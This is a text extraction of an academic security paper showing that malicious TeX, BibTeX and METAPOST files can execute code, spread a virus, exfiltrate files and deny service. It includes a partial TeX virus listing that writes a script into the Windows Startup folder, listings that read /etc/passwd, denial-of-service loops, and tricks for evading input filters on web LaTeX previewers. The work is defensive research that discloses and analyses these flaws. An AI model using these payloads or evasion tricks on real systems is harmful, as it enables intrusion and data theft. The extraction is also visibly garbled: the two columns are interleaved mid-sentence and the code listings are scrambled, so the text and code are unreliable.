<<

Are Text-Only Data Formats Safe? Or, Use This LATEX Class File to Pwn Your Computer Stephen Checkoway Hovav Shacham Eric Rescorla UC San Diego UC San Diego RTFM, Inc.

Abstract are all plain text and thus, na¨ıvely, “safe.” LATEX and BIBT X files are routinely transmitted in research envi- We show that malicious T X, BIBT X, and METAPOST E E E ronments — a practice we show is fundamentally unsafe. files can lead to arbitrary code execution, viral infec- Compiling a document with standard T X distributions tion, denial of service, and data exfiltration, through the E allows total system compromise on Windows and infor- file I/O capabilities exposed by TEX’s Turing-complete mation leakage on UNIX. macro language. This calls into doubt the conventional wisdom view that text-only data formats that do not ac- TEX is unsafe. ’s TEX is the standard cess the network are likely safe. We build a TEX virus typesetting system for mathematical documents. It is that spreads between documents on the MiKTEX distri- also a Turing-complete macro language used to inter- bution on Windows XP; we demonstrate data exfiltration pret scripts from potentially untrusted sources. In this attacks on -based LATEX previewer services. paper, we show that a specific capability exposed to TEX macros — the ability to read and write arbitrary files — 1 Introduction makes it (and other commonly used bits of TEXware, The divide between “code” and “data” is among the most such as BIBTEX and METAPOST) a threat to system se- fundamental in computing. Code expresses behavior curity and data privacy. or functionality to be carried out by a computer; data We demonstrate two concrete attacks. First, as an ex- encodes and describes an object (a photo, a spreadsheet, ample of running arbitrary programs, we build a TEX etc.) that is conceptually inert, and examined or manip- virus that affects recent MiKTEX distributions on Win- ulated by means of appropriate code. The complexity of dows XP, spreading to all of a user’s TEX documents. data formats for media manipulated by desktop systems, The virus requires no user action beyond compiling an together with the inability of programmers to write infected file. Our virus does nothing but infect other doc- bug-free code, has generated a stream of exploits in uments, but it could download and execute binaries or common media formats. These exploits take advantage undertake any other action it wishes. of software bugs to induce arbitrary behavior when a Second, we describe data exfiltration and denial of ser- user views a data file, even seemingly simple ones such vice attacks against web-based LATEX and METAPOST as Windows’ animated cursors [16]. The inclusion of previewer services. Our findings have implications for powerful scripting languages in file formats like Mi- any online service that compiles or hosts TEX files on crosoft’s Word has led to so-called macro viruses,1 and behalf of untrusted users, including the Comprehensive to PostScript documents that violate a paper reviewer’s TEX Archive Network (CTAN) and Cornell University anonymity [3]. These two trends have combined in Library’s arXiv.org preprint server. the use of PDF files that include JavaScript to exploit Defenses. The lesson we teach here is one learned over bugs in Adobe’s Acrobat; by one report [19], some and over: As the Internet has made document sharing 80% of exploits in the fourth quarter of 2009 used easier and more pervasive, file formats once considered malicious PDF files. Thus the complexity and opacity trusted have become attack vectors, either because the of data formats has made data behave more like code. parser was insecure or because the scripting capabili- On the other side, a line of work culminating in the ties exposed to files in the format have unforeseen con- English-language shellcode of Mason et al. [13] has sequences. Barring a fundamental change in the way shown how to make code look more like data. that data-handling code is designed and implemented, In this paper, we present a case study of another un- we must set aside the idea that data, unlike code, can safe data format, one that is of particular interest to the be “safe”; we should instead treat data-processing code academic community: TEX. Unlike Word documents as inherently insecure and design systems that can with- or PDF files, the input file formats associated with TEX stand its compromise — as, for example, Bernstein has advocated [5]. 1Amusingly, some advocacy documents list “no macro viruses” as an advantage TEX has over Word; see, e.g., http://web.mit. For TEX specifically, there are three main approaches edu/klund/www/urk/texvword.html. to protect against abuse of interpreted languages. First,

1 one could audit the for vulnerabilities that al- the text were typed directly into the main document: low the attacker to subvert the intended restrictions on \input file (or in LATEX, \input{file}). the scripting language. Such vulnerabilities are com- \@input LATEX internal similar to TEX’s \input. monly found in supposedly safe file formats and fre- \@@input LATEX internal identical to TEX’s \input. quently allow the attacker to execute arbitrary code, as \jobname TEX primitive that expands to the name of in Dowd’s recent ActionScript exploit [8]. We know of the file being compiled without its extension. no such vulnerabilities in TEX, but their absence does \newread (LA)TEX macro to allocate a new stream for nothing to defend against capabilities granted to TEX file reading: \newread\file. scripts by design, including the file I/O that forms the \openin TEX primitive that opens a file and associates basis for our attacks. A second approach is to attempt to it with a read stream: \openin\file=foo.ext. establish a safe subset of commands, through blacklist- \read TEX primitive that reads a line from a file, as- ing, whitelisting, or other forms of filtering or rewriting. signing each character the category code currently (This is akin to code-rewriting systems in which code is in effect: \read\file to\line stores the tokens verified safe at load-time [17].) As we show below, the produced from the file into \line. malleability of the TEX language makes it difficult to fil- \readline ε-TEX extension that behaves as \read ter safely. A final, more drastic approach is to treat the but assigns only the category codes “other” and entire system as untrusted and sandbox it using the op- “space.” erating system’s isolation mechanisms; as we show, this \relax TEX primitive that takes no action; just relaxes. seems like the most promising approach for TEX. \write TEX primitive that writes an expanded token list Observations similar to the ones we have made for TEX to a file: \write\file{foo}. apply to other data formats that are programmable (e.g., Other control sequences are used below, but either their using JavaScript) or require complicated and error-prone behavior is clear or their use is not of central importance. parsers. Ensuring that all programs that process such for- TEX parsing behavior. TEX’s behavior is usually de- mats are appropriately sandboxed represents a reimagi- scribed in terms of a “mouth” and a “stomach.” The exact nation of the way traditional desktop environments are behavior is fairly complex but the following simplified engineered; a redesigned system would dovetail with the description will suffice for this paper. TEX’s mouth reads principles laid out by Bernstein [5]. each line of input character by character and produces a 2 Low-level details of TEX stream of tokens which are acted on by TEX’s stomach. There are two types of tokens produced by T X’s In this section, we recall some features of the T X pro- E E mouth — character tokens and control sequences — and gramming language and the LAT X macro package. The E their production is governed by the category code — an discussion covers only the behaviors on which our attack integer in 0–15 — of the characters read. At any given relies; for more complete coverage we refer the reader time, each input character is associated with a single to [6, 11, 24]. Even so, the discussion is quite technical. category code. Except in certain situations, expand- Readers not interested in T X arcana are encouraged to E able tokens (e.g., macros) are expanded into other tokens continue to Section 3, referring back to this section for en route to T X’s stomach. Once in the stomach, T X reference as necessary. E E processes the tokens, performing assignments — such as Important control sequences. TEX and LATEX behav- changing category codes — and typesetting. ior is principally controlled by a variety of control se- When TEX encounters two identical characters tokens quences, conventionally a sequence of characters pref- with category code 7, (by default only ˆ ), followed by aced by a backslash (\). Below are some of the control two lowercase hexadecimal numbers, it treats the four sequences we will use in the remainder of the paper. characters as if a single character with ASCII value the \catcode TEX primitive that changes the category code hexadecimal number had appeared in the input. of a character: \catcode`\X=0 changes the de- fault category code of X from “letter” to “escape 3 Malicious TEX usage character.” It is generally assumed that it is safe to process arbitrary, \csname ... \endcsname TEX primitive that builds untrusted documents with TEX, and by extension LATEX. control sequences: \csname foo\endcsname is However, this is untrue; in fact, TEX can write arbitrary (almost) the same as \foo. files to the filesystem. On UNIX systems, TEX output \include LATEX macro that behaves as \input except is typically restricted to the local directory and its sub- that the included material begins on a new page: directories, which limits the scope of attack somewhat. \include{file}. However, MiKTEX, the most common TEX distribution \input TEX primitive (redefined by LATEX) that reads for Windows, has no internal controls on where output the contents of its space-separated argument as if can be written.

2 This ability to write to any file presents an obvious principle execute any JScript code and do far more dam- danger in that important files can be overwritten or the age than just modifying LATEX files on disk. computing environment can be changed by the intro- An earlier proof-of-concept TEX virus for NetBSD duction of new files. The average user’s computer is a was designed in 1994 by Keith McMillan [15]. McMil- target-rich environment, with any number of files which, lan’s modifies a user’s GNU Emacs initialization file when modified, allow the attacker to execute code in the (something no longer possible with Web2C based TEX user’s environment. For concreteness, we focus on a sin- distributions) and relies on the user’s visiting a directory gle case: on Windows XP we can write JScript files to a in Emacs to spread to other . files in that directory. user’s Startup directory which will be executed by the By contrast, our virus works on modern Windows sys- Windows Script Host facility at login. tems and requires no user interaction beyond an eventual Once the script is executed, one possibility is it could relogin. download and run a binary of the attacker’s choice using the Microsoft.XMLHTTP object. For example, this 3.2 BIBTEX databases could cause the computer to become part of a botnet. One potential barrier to using TEX for application exe- There is one technical hurdle that must be overcome cution is that the user might notice any malicious code in order to write to the Startup directory, namely present in files he is editing. BIBTEX databases provide a spaces in the file path, which TEX does not ordinarily two-fold solution by (1) moving the malicious code out allow. However, we can leverage Windows’ compati- of the main document so it is less noticeable; and (2) al- bility with older programs that expect file and directory lowing the code to be widely distributed. names in 8.3 format. For example, StartMenu can be BIBTEX is a program used to turn a database of refer- specified as STARTM˜1. We use this compatibility in ences (the .bib files) into LATEX code for a bibliography our proof-of-concept for application execution, a LATEX consisting of the references for the citations in the paper virus. (the .bbl files). Subsequent runs of LATEX cause the text of the generated .bbl files to be \input into the 3.1 A two-stage virus document at the specified location. It is quite common The virus attacks in two phases. In the first phase, it for users to simply download BIBTEX entries or even en- copies the payload to disk and install the appropriate tire databases, such as the RFC BIBTEX files provided by JScript file into Startup. In the second phase, the Miguel Garcia Martin. In the latter case, the database JScript file finds other LATEX documents on the disk and often contains a large number of entries which the user infects them. does not carefully examine; indeed he may never even The first phase takes advantage of the fact that the TEX look at the entries but rather search the database with a engine used in MiKTEX — and indeed in all modern TEX tool such as RefTEX. This facilitates an attack since ma- distributions — is pdfTEX which contains the ε-TEX ex- licious code may be harder to notice in a large file full of tension \readline [23]. First, \readline is used to unused information. read the document being compiled line by line and write Each BIBTEX entry has the form @type..., where an exact copy to C:\WINDOWS\Temp\sploit.tmp. type is one of the types understood by a particular style Then, a JScript file containing the second phase of the such as book or article. There is an additional entry virus is written to the Administrator’s Startup direc- type, @preamble, which inserts text verbatim into the tory. Since the exact details of how this is accomplished .bbl file just before the bibliography. In addition, mul- are rather technical, they are omitted; however, the code tiple @preamble entries are concatenated into a single for the first phase is given in Listing 1. line in the order they appear in the database. Thus, ma- The second phase, written in JScript, first creates a licious code can be separated into arbitrarily many parts FileSystemObject, then it reads the sploit.tmp and scattered (in order) throughout the .bib file, and file, and extracts all of the TEX code between two marker will be executed regardless of which entries the author lines — the virus code. Next, it finds all of the files in the actual cites. Administrator directory with the extension .tex. Other file formats that embed TEX commands can also Finally, those files which contain \end{document} be used as attack vectors. Examples include graphics lan- have the virus inserted just before the end. guages such as METAPOST and Asymptote. In total, the virus requires two marker lines and 21 80- 3.3 Class and style files column lines of TEX. The TEX code is given in Listing 1; in the interest of not providing a complete, working virus, Base LATEX functionality is extended through the use of the majority of the JScript is omitted, but the remaining class files which set the overall format of the document code is straightforward and we have tested it in our own to be produced and style files which typically change systems. Moreover, it should be clear that we could in the behavior of one aspect of the document. At present,

3 Listing 1: Virus code with JScript omitted. %%%%SPLOIT%%%% {\newwrite\w\let\c\catcode\c`*13\def*{\afterassignment\d\count255"}\def\d{% \expandafter\c\the\count255=12}{*0D\def\a#1ˆˆM{\immediate\write\w{#1}}\c`ˆˆM5% \newread\r\openin\r=\jobname \immediate\openout\w=C:/WINDOWS/Temp/sploit.tmp \loop\unless\ifeof\r\readline\r to\l\expandafter\a\l\repeat\immediate\closeout \w\closein\r}{*7E*24*25*26*7B*7D\immediate\openout \w=C:/DOCUME˜1/ADMINI˜1/STARTM˜1/PROGRAMS/STARTUP/sploit.js \c`[1\c`]2\c`\@0 \newlinechar`\ˆˆJ\endlinechar-1*5C@immediate@write @w[fso=new ActiveXObject("Scripting.FileSystemObject");foo=ˆˆJ h11 lines of JScript omittedi f(fso.GetFolder("C:\\Documents and Settings\\Administrator"));}m();] @immediate@closeout@w]}% %%%%SPLOIT%%%%

CTAN has 1080 user contributed LATEX 2ε packages. The Listing 2: Reading a file a line at a time. MiKTEX repository on CTAN has 1908 packages. Sim- \openin5=/etc/passwd ilar to the situation with large BIBTEX databases, most \def\readfile{% users never examine a style or class file. If a popular \read5 to\curline package on one of the many CTAN mirrors were mod- \ifeof5 \let\next=\relax ified to contain malicious code, it might affect a large \else \curline˜\\ let next number of LATEX users before being discovered. \ \ =\readfile Rather than corrupting an existing package, an at- \fi tacker could submit a package, e.g., purporting to imple- \next}% \ifeof5 Couldn't read the file!% ment the guidelines for submission to a conference, to \else \readfile \closein5 CTAN. Anyone using such the package would be at risk. \fi A 4 Web-based LTEX previewers The basic idea is to open a file for reading, read it one We now turn our attention to a slightly harder target. line at a time, and feed it to the typesetting engine. The There are more than a dozen web-based services that code for this is given in Listing 2. compile LATEX files on users’ behalf and return the result- An additional problem is processing characters in the ing PDFs. We have designed successful exfiltration and input that TEX considers to be special. For example, run- file writing attacks on most of these services. Moreover, ning the code in Listing 2 on one of the authors’ com- the filtering mechanisms devised by these services were puter produces the error “You can’t use ‘macro parameter largely ineffective against our attacks. We have disclosed character #’ in horizontal mode.” This is easily fixed by the vulnerabilities we found to the affected services to changing the category code for # with \catcode`\#=12 the operators, with universally positive responses. As a before the \read command in Listing 2 and restoring it result, number of operators changed their security policy afterward. Other special characters can be handled in an or removed the previewer altogether. analogous manner. Alternatively, the \readline primi- tive from -T X can be used. 4.1 Reading files ε E All properly configured web servers allow only a subset 4.2 Writing files of the files on the computer to be visible to connecting As discussed in Section 3, Web2C-based TEX distribu- clients. In this section, we show how we can use the tions such as teTEX and TEX Live typically only allow power of TEX to read files from web servers that expose files to be output in the current directory or a subdi- a LATEX interface. rectory. However, this still leaves room for attacks. A There are various ways that an attacker can use the common way to generate images for displaying in a web exposed LATEX interface to read files not exposed by the page is to make a temporary directory — for example in web server. The two most obvious approaches are using /tmp — and generate the needed files inside that direc- \input or \include to interpolate the text of the file tory. Afterward, the images are copied elsewhere or used into the TEX input and hence the output document. One immediately and then the whole directory is deleted. A minor problem with this approach is that we have lost previewer that generates images in a web-accessible di- line breaks in the input file since TEX will treat them as rectory and then cleans up the specific files it knows will spaces in the usual manner. One way to avoid losing be generated but not needed may be vulnerable to attack. line breaks, as well as circumventing blacklisting of such For example, on a web server that allows PHP, an attacker control sequences, is to use TEX’s ability to read files. need only open a file using \openout and use \write

4 to write PHP code, which would then be executed by the Xinput. Additionally, one can use ˆˆ5c in place of \ server when the attacker did an HTTP request for that file. as described in Section 2. Of course, other characters If the previewer is based on MiKTEX, these constraints could be replaced, not simply \, for example, if the word are relaxed and attack is even easier. “input” is not allowed anywhere in the previewer’s input, ˆˆ70 4.3 Denial of service then ‘p’ can be replaced with . Yet another possibility is for an attacker to invoke Any previewer that allows the TEX looping construct \@input or \@@input directly — this requires using ei- \loop ... \repeat or the definition of new macros is ther \makeatletter or \catcode to change the cate- at risk of a denial of service attack. The shortest form gory code of @ to “letter.” In all likelihood, there are a of this attack is \loop\iftrue\repeat. Another way number of LATEX internals that could be used to facilitate to achieve this is to use \def\nothing{\nothing}. an attack. These are much less well known outside of the The loops cause TEX to burn CPU cycles without actually package writing community and are thus likely to escape producing anything. If enough instances of it happen at the notice a web site administrator attempting to secure a once, the computer will slow to a crawl and no more use- LATEX previewer. ful work will be possible until the processes are killed. One can make use of a peculiarity of the implementa- One extension of this attack is to cause T X to pro- E tion of LATEX environments to evade filters that look for duce very large files, potentially filling up the disk. The control sequences starting with \.ALATEX environment way to do this without exhausting TEX’s memory is to foo consists of a pair \begin{foo} ... \end{foo}. produce pages of output so that TEX will discard from its The \begin{foo} and \end{foo} macros execute the memory the pages it has already processed. This can be control sequences \foo and \endfoo using \csname. done using \shipout — a TEX primitive that writes the Thus, one can execute any control sequence by pass- contents of the following box to the output file. ing its name as the argument to \begin. If \endfoo 4.4 Escaping math mode is not defined, TEX defines it as \relax. For ex- ample, \begin{TeX}\end{TeX} eventually executes Many of the LAT X previewers on the web were designed E \TeX\relax only to display mathematics. As a result, the text that . Since the backslash before the control \begin the user inputs is copied into a mathematics environ- sequence name is not present when using , it does not trigger a filter looking for particular control ment in an otherwise-complete LAT X document to pass E sequences which begin with \. One can pass argu- off to LAT X for compilation. The most common way E ments to a macro simply by placing the argument af- to do this is to put the input inside a eqnarray* or ter the \begin. For example, one can read files with align* environment. To get out of math mode, we \begin{input}{/file/path}\end{input}. simply start the input with \end{eqnarray*} (resp. \end{align*}) and to ensure that the document com- 4.6 METAPOST piles, we end the input with \begin{eqnarray*} (resp. METAPOST \begin{align*}). Alternatively, to get out of math is a declarative, macro programming lan- mode temporarily, we can use \parbox. guage, based on , used to produce vector graphics, often for inclusion into (LA)TEX documents. 4.5 Evading Filters Like TEX, METAPOST is an extremely powerful lan- The natural defense against the attacks described in this guage and as such, there are dangers associated with pro- section is to filter out dangerous commands. However, viding a METAPOST previewer on the web. this is more difficult than it first appears. In this section, The first such danger is the ability to write arbitrary we describe a number of techniques for evading simple single line TEX fragments. Any literal text that ap- filters. For concreteness, the discussion below is limited pears between btex and etex is written to a tex to \input, but most of the techniques are applicable to file which is compiled by TEX and the result is in- all the commands discussed above. cluded into the METAPOST output; this is often used Using some of the features and control sequences de- for typesetting labels. METAPOST provides a way scribed in Section 2, we can use \input without having to include arbitrary, multi-line TEX code at the begin- to write the literal string \input. For example, we can ning of the tex file used with btex...etex using use \csname input\endcsname. This attack is more the verbatimtex...etex construct. The latexMP likely to succeed than \input because \csname is used package makes using LATEX for typesetting easy. It in- mostly by package writers and only rarely by authors. cludes a macro textext which takes a string argument An attacker can evade simpleminded filters by using containing a single line of LATEX to typeset. As a result, \catcode to change the category code of another char- all of the attacks discussed thus far work just as well for a acter to “escape” and use that in place of \. For exam- METAPOST previewer that allows the btex...etex ple, one can change the category code of ‘X’ and use construction or allows the use of the latexMP package.

5 Listing 3: Reading a file with METAPOST. Listing 4: Creating 4096 files per minute with META- picture p; POST. p := nullpicture; filenametemplate "%j%c%y%m%d%H%M"; forever: i := 0; string line; forever: line := readfrom "/etc/passwd"; beginfig(i); exitif line = EOF; % Add METAPOST code here p := thelabel.lrt( line, endfig; (0, ypart llcorner p) ); if i = 4095: draw p; i := 0; endfor; else: i := i + 1; Even worse, from a web site administrator’s point of fi; view, is that since latexMP allows strings and not just lit- endfor; eral data to be typeset, attempting to sanitize input to the gle infinite loop is produced to check for the presence of textext macro requires performing a data flow anal- timeouts.2 No attempts were made to write files, conse- ysis that can prove that no harmful control sequences quently those attacks are unevaluated. Table 1 contains make it into the string ultimately used as the argument. the results of the attacks. As can be seen, the majority of A second danger is that METAPOST includes com- the attacks were successful. mands for reading and writing files, readfrom and write, respectively. To read an arbitrary file such as 4.7.1 Equation previewers /etc/passwd, we can use the code in Listing 3. The first group of LATEX previewers in Table 1 [4, 7, As seen in Listing 3, METAPOST has a command 12, 14, 18, 22] are meant to display a single mathemat- forever that loops forever. In addition to forever, ical statement at a time. Many of the previewers’ au- METAPOST allows macro definitions via def which thors took precautions against several of the file reading can be used to simulate looping. As before, we can ac- attacks described in Section 4.1 by attempting to pre- tually do more than simply burn CPU cycles. We can process the input and either remove or disallow partic- try to write large files or write many files. For exam- ular portions of input with varying degrees of success. ple, Listing 4 will produce a maximum of 4096 files per All of them neglected to account for the TEX primitive, minute. This limit is due to METAPOST’s maximum \openin and all were potentially vulnerable to denial of numeric value being slightly under 4096. service attacks via infinite loops using either \loop or One final avenue of attack against a METAPOST pre- \def. viewer is to use the scantokens command. It takes a 4.7.2 Full document previewers string argument and reads the string as if the contents had been written literally in the file at that point, with a few The second group of LATEX previewers in Table 1 [1, 9, exceptions. In particular, any of the attacks listed here 20, 21, 26, 27] are meant to display a complete LATEX could be created using string operations and then passed document. By their very nature, full document preview- to scantokens. ers must be permissive if they are to be useful. Full doc- ument previewers are potentially vulnerable to all of the 4.7 Evaluation same vulnerabilities as the equation previewers as well as We tested the aforementioned attacks against a variety vulnerabilities that come from allowing the inclusion of packages. For example, the Listings package, designed of web sites running LATEX previewers. The previewers examined vary in the type of content they were meant to to typeset source code listings, can be used to read and accept from a single mathematical expression to an entire display text files. All of the full document previewers we evaluate except for ScribT X — which employs several LATEX document. E Since our goal was to probe but not attack these web of the defenses discussed in Section 4.8 — are vulnera- sites, file reading was restricted to files with no security ble to all of the attacks except \input. implications such as /etc/hostname on UNIX and 4.7.3 MathTran C:\WINDOWS\win.ini on Windows. Rather than ac- MathTran [25] was designed as a TEX previewer with tually produce multiple infinite looping instances, we test security in mind. MathTran uses Secure plain TEX, a that macros can be defined by defining benign macros us- ing \def, \gdef, etc. Looping via \loop is attempted 2Since webservers typically have timeouts of several minutes for using the code in Listing 5. If \loop is allowed, the frag- CGI — for example, Apache and IIS both default to five minutes — this infinite loop causes no real damage. However, the timeout is long ment will output “before after before.” Once it has been enough that a real attacker attempting a denial of service would simply determined which of the looping constructs work, a sin- have to create new infinite loops every few minutes.

6 \loop \def \input \@input \csname \catcode ˆˆ5c \openin \begin

LATEX Eqn. Ed. for the Internet [4] XXXXX Roger’s Online Eqn. Ed. [7] XXXXXXXXX LATEX Eqn. Ed. [12] XXXXXXXX mathURL† [14] XXXXXXXX Hamline LATEX Eqn. Ed. [18] XXXXXXXXX MathBin.net [22] XXXXXXXX ‡ ScribTEX [1] XX LATEX Previewer [9] XXXXXXXX ScienceSoft LATEX [20] XXXXXXXX LATEXLab [21] XXXXXXXXX LATEX Online Compiler [26] XXXXXXXX Web LATEX [27] XXXXXXXXX MathTran [25]

Table 1: LATEX previewer vulnerabilities. The \loop and \def columns contain a X if the attack could be used to cause a denial of service by producing an infinite loop. The other columns contain a X if the attack can be used to read input. † The only files we were able to read were the input and the ones produced by LATEX. It is unknown if others were accessible. ‡The previewer contains a timeout of several seconds.

Listing 5: Testing for \loop. viewer to be useful, the list of acceptable control se- \newif\iffoo\footrue quences would be quite large. MathTran [25] takes a \loop before similar approach, except that rather than have a prepro- \iffoo after \foofalse cessing step, plain TEX itself is completely reimple- \repeat mented. Rather than preprocessing the input, a better approach reimplementation of plain TEX that prevents using any control sequence other than those meant for typesetting. leverages the power of TEX to perform the input sani- As a result, all of the attacks described above fail, with tization. The mathURL previewer [14] takes this ap- the one exception of escaping from math mode. This is proach by redefining \input and \include to be no- the most secure web-based previewer we evaluate. op macros that just expand to their own arguments. Had \@@input been redefined instead, the majority of the METAPOST 4.7.4 file reading attacks would have failed since all of LATEX’s The one METAPOST previewer we evaluate [10] is vul- input macros rely on \@@input. Similar to blacklist- nerable to reading and writing files using the META- ing, this approach requires deciding on a set of disal- POST commands. It is also vulnerable to all of the at- lowed macros and then redefining them; however, it does tacks that [9] is vulnerable to using the btex...etex not fall prey to using the ˆˆ5c, \catcode, \csname, construct. or \begin attacks with the redefined macros. As with blacklisting, it still requires knowing which control se- 4.8 Defenses against attacks quences to redefine. As we have seen, simply filtering out macros deemed A more promising approach for preventing TEX from unsafe is problematic. First, the list of macros that reading sensitive files is to leverage TEX runtime configu- would need to be blacklisted is quite large, especially ration parameters. Web2C-based TEX distributions con- if the user can add additional packages. For example, tain the runtime configuration parameter openin any the LATEX 2ε kernel alone defines the macros \include, that, when set to p, for “paranoid,” disallows reading any \input, \@input, \@iinput, \@input@, \@@input, files in a parent directory. By default, this parameter is and \InputIfFileExists [6]. Second, style and class set to allow any files to be read. This relies on the par- files can contain additional macros for reading files, for ticular TEX implementation correctly implementing this example \lstinputlisting from the listings package parameter. Unfortunately, MiKTEX does not contain a or \verbatiminput from the verbatim package. The similar configuration parameter. A similar parameter for blacklisting approach seems unlikely to succeed without Web2C-based distributions controls writing. a complete understanding of TEX and LATEX. A second approach (which can be used in concert with Instead of blacklisting unsafe macros, we could in- the first) is to run TEX in an operating system jail con- stead whitelist macros deemed safe. This approach taining just the files needed for the TEX distribution. This seems difficult to implement and verify successfully. For approach has two major advantages. First, it is not sen- example, it would be easy to overlook the fact that ˆˆ5c sitive to details of the TEX implementation. Second, it starts a new control sequence. In addition, for the pre- allows us to leverage existing work on process isolation.

7 We note that ScribTEX uses both the configuration and [9] Troy Henderson. LATEX previewer. jail approaches and this is the reason it is impervious to http://www.tlhiv.org/ltxpreview. all of the file reading attacks [2]. [10] Troy Henderson. METAPOST previewer. Defending against denial of service attacks only re- http://www.tlhiv.org/mppreview. quires a timeout short enough to ensure that the server [11] Donald E. Knuth. The TEXbook. Addison-Wesley does not get overwhelmed. Professional, 1986. 5 Conclusions [12] LATEX equation editor. Conventional wisdom in security distinguishes between http://www.sitmo.com/latex. “safe” and “unsafe” data files. Binary files are more risky [13] Joshua Mason, Sam Small, Fabian Monrose, and Greg than text files; content that interacts with the network MacManus. English shellcode. In Somesh Jha and is more risky than purely local content. In this paper, Angelos Keromytis, editors, Proceedings of CCS 2009, we argue that even seemingly safe data files can be un- pages 524–33. ACM Press, November 2009. safe. Although TEX documents are plain text, manipu- [14] mathURL. http://mathurl.com. lating maliciously constructed LATEX documents or class [15] Keith Allen McMillan. A platform independent files, BIBTEX databases, or METAPOST graphics files computer virus. Master’s thesis, The University of can lead to arbitrary code execution, viral infection, de- Wisconsin—Milwaukee, April 1994. Online: nial of service, and data exfiltration. http://vx.netlux.org/lib/vkm00.html. Acknowledgments [16] Microsoft. Vulnerabilities in GDI could allow remote code execution (925902). Microsoft Security Bulletin We thank Stefan Savage for numerous helpful conversa- MS07-017, April 2007. Online: tions; Troy Henderson for letting us experiment exten- http://www.microsoft.com/technet/ sively with his LATEX and METAPOST previewers; llll security/Bulletin/MS07-017.mspx. from FreeNode’s # for pointing out the \begin at- [17] George C. Necula and Peter Lee. Safe kernel extensions tack; and the anonymous reviewers for their helpful com- without run-time checking. In Karin Peterson and Willy ments. Zwaenepoel, editors, Proceedings of OSDI 1996, pages References 229–43. USENIX, ACM SIGOPS, and IEEE TCOS, October 1996. [1] James Allen. ScribT X. E [18] Andy Rundquist. Hamline university physics department http://www.scribtex.com. LATEX equation editor. http://www.hamline. [2] James Allen. Personal communication, April 2008. edu/˜arundquist/equationeditor. [3] Michael Backes, Markus Durmuth,¨ and Dominique [19] ScanSafe. Annual global threat report. Online: Unruh. Information flow in the peer-reviewing process http://www.scansafe.com/downloads/gtr/ (extended abstract). In Birgit Pfitzmann and Patrick 2009_AGTR.pdf, 2009. McDaniel, editors, Proceedings of IEEE Security & A Privacy 2007, pages 187–191. IEEE Computer Society, [20] ScienceSoft LTEX. http://sciencesoft.at/latex/?lang=en May 2007. . [21] Bobby Soares. LAT XLab. [4] Will Bateman and Steve Mayer. LATEX equation editor E for writing mathematics on the internet. http://www.latexlab.org. http://www.codecogs.com/components/ [22] Mark A. Stratman. MathBin.net. equationeditor/equationeditor.php. http://mathbin.net. [5] Daniel J. Bernstein. Some thoughts on security after ten [23] Han` Theˆ´ Thanh,` Sebastian Rahtz, Hans Hagen, Harmut years of qmail 1.0. In Ravi Sandhu and Jon A. Solworth, Henkel, Pawł Jackowski, and Margin Schroder.¨ The editors, Proceedings of CSAW 2007, pages 1–10. ACM pdfTEX user manual, January 2007. Press, November 2007. Invited paper. [24] The NTS Team. The ε-TEX manual. [6] Johannes Braams, David Carlisle, Alan Jeffrey, Leslie Max-Planck-Institut fur¨ Physik, February 1998. Lamport, Frank Mittelbach, Chris Rowley, and Rainer [25] The Open University. MathTran – Online translation of Schopf.¨ The LATEX 2ε sources, December 2005. mathematical content. [7] Roger Cortesi. Roger’s online equation editor. http://mathtran.open.ac.uk. http://rogercortesi.com/eqn/index.php. [26] Annett Thuring.¨ LATEX online compiler. http: [8] Mark Dowd. Application-specific attacks: Leveraging //nirvana.informatik.uni-halle.de/ the ActionScript virtual machine. ˜thuering/php/latex-online/latex.php. http://documents.iss.net/whitepapers/ IBM_X-Force_WP_final.pdf, April 2008. [27] Web LATEX. http://dev.baywifi.com/latex.

8